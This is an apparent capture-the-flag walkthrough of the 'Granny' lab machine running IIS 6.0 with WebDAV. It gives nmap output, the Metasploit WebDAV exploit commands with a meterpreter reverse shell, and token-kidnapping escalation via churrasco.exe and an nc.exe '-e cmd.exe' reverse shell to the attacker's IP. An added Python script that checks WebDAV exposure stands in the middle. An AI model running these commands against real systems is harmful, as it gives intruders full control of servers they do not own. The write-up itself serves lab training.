MACHINE IP — 10.10.10.14

NMAP
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Date: Tue, 24 Sep 2019 03:01:11 GMT
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
Here we see that only the HTTP port is open. Visiting the site didn't give us much information that could help us get in, so let's search for exploits for the services NMAP found.
After searching for a while we find that there is a Metasploit exploit which can help us get a shell:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl
set rhost 10.10.10.14
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.14.2
run
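To turn the scan finding above into something a defender can act on, here is an added Python check (not part of the original writeup) that parses the nmap http-methods / http-webdav-scan output and reports which WebDAV write methods the server exposes. The sample input is the port-80 scan output from this page; the write/read classification of WebDAV methods is my own assumption.

```python
import re

# Sample input: the port-80 script output from the nmap scan on this page.
NMAP_OUTPUT = """\
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
"""

# Classification is my own (assumption): methods that let a client create,
# overwrite, move or delete server content, versus read-only WebDAV methods.
WEBDAV_WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}
WEBDAV_READ_METHODS = {"PROPFIND", "SEARCH"}

# Matches nmap script lines such as "|_ Potentially risky methods: TRACE DELETE ..."
METHOD_LINE = re.compile(r"^\|_?\s*([A-Za-z ]+(?:methods|options)):\s*(.+)$", re.IGNORECASE)


def parse_method_fields(nmap_text):
    """Return {field name: set of methods} for every methods/options line in the output."""
    fields = {}
    for line in nmap_text.splitlines():
        m = METHOD_LINE.match(line)
        if m:
            name, values = m.group(1).strip(), m.group(2)
            fields[name] = {v for v in re.split(r"[,\s]+", values) if v}
    return fields


def assess_webdav(nmap_text):
    """Summarise WebDAV exposure: which write methods are reachable and how severe that is."""
    fields = parse_method_fields(nmap_text)
    exposed = set().union(*fields.values()) if fields else set()
    write_methods = sorted(exposed & WEBDAV_WRITE_METHODS)
    webdav_enabled = bool(exposed & (WEBDAV_READ_METHODS | WEBDAV_WRITE_METHODS))
    if write_methods:
        severity = "high"   # remote clients can author content on the server
    elif webdav_enabled:
        severity = "low"    # WebDAV answers, but only read-only methods
    else:
        severity = "info"
    return {"webdav_enabled": webdav_enabled, "write_methods": write_methods,
            "trace_enabled": "TRACE" in exposed, "severity": severity}


if __name__ == "__main__":
    print(assess_webdav(NMAP_OUTPUT))
```

A "high" result means WebDAV authoring is reachable from the network; on IIS that extension should be disabled, or the write methods restricted, unless it is genuinely needed.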

Using this exploit we get a reverse shell.
Here we are just a normal user, "nt authority\network service", and now all we have to do is escalate privileges to NT AUTHORITY\SYSTEM.
PRIVILEGE ESCALATION
Here we are 'nt authority\network service' and we found a way to escalate privileges via token kidnapping.
Let's get a file from our local system onto the target system:
upload /usr/share/sqlninja/apps/churrasco.exe
churrasco.exe runs the command passed to it as SYSTEM, so we can use it to get a reverse shell with SYSTEM privileges.
Since we have a meterpreter shell, moving files to the target is not difficult: we just use the upload command.
Now we upload nc.exe for getting a reverse shell:
upload /usr/share/sqlninja/apps/nc.exe
NOTE :- make sure you have both nc.exe and churrasco.exe in the same directory; I had them in C:\WINDOWS\TEMP

Now let's switch from the meterpreter shell to a Windows cmd shell using the shell command in meterpreter. Then run the command below to get a shell back at our local system:
churrasco.exe "nc.exe 10.10.14.2 1234 -e cmd.exe"

And here we have our SYSTEM shell on our nc listener.

Now we can access the whole system without any restrictions.

cowabunga